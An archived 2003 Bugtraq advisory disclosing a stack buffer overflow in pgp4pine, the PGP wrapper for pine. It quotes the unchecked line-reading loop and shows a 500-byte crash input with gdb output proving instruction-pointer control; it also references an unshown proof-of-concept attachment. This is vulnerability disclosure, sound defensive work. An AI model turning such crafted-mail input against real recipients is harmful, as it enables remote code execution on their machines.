| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 12 Mar 2003 16:52:36 +0100 (CET)
From: Eric AUGE <eric.auge@...com>
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org
Subject: pgp4pine stack overflow vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Following informations:
I Background:
pgp4pine is a mail encryption/decryption/signature/verification wrapper
to gpg for pine, it is called from pine to parse mail body and get PGP
information from the file.
more information : http://pgp4pine.flatline.de/
II Problem description:
When installed/configured within pine, pgp4pine parse any incoming mail
before reading (in the default standard configuration) looking for
PGP tokens & informations to do his sender's signature verifications.
To verify incoming mail it calls :
menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
and read each line according to this loop :
[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
fertig=0;
while (!fertig)
{
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
else if ((readline[i++]=c) == '\n')
{
readline[i]='\0';
fertig=1;
}
}
fertig=0;
if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
{
/* got signed message */
fclose(fin);
while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
fertig=1;
}
else if (strncmp("-----BEGIN PGP",readline,14)==0)
{
/* got another type of PGP message (encrypted, keys ...) */
fclose(fin);
fileDecrypt(inFile,outFile);
waitForReturn();
fertig=1;
}
else
i=0; /* Got waste line, reset i */
} while (!fertig);
[...]
If a single line go over 256 chars directly to EOF,
it will overwrite saved environnement on the stack and return,
since there is no check on the index 'i' within the readline[] array,
[...]
}
else if ((readline[i++]=c) == '\n')
{
[...]
you can can go over CONSOLE_IO_LINE_LENGTH and replace necessary
saved registers before hiting one condition to return.
[...]
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
[...]
then try:
rival@...es ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@...es ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@...es ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Here it is ;)
III Impact
Since pgp4pine process any incoming email, sending special crafted email
can make sender execute arbitrary code on the recipient box when the
mail is opened.
IV Workaround/Solutions
Deactivate pgp4pine and use another pgp wrapper for pine :
http://pgpenvelope.sourceforge.net/
http://www.megaloman.com/~hany/software/pinepgp/stable.html
or any other...
author holger@...tline.de has been contacted since 01/2003
no reply since :/
V Proof of concept
Attached proof of concept code, for any informations read the source.
Best Regards,
- ---
Eric AUGE.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)
iD8DBQE+b1fGL/U5psk9l1gRAr1RAJ4pnFriwS073R3fEcGp+1nMF4Q58gCfdLAK
3aY03iuZQPfonSiyaqa5/Co=
=zirR
-----END PGP SIGNATURE-----
View attachment "mailex-gen.c" of type "TEXT/PLAIN" (2876 bytes)
Powered by blists - more mailing lists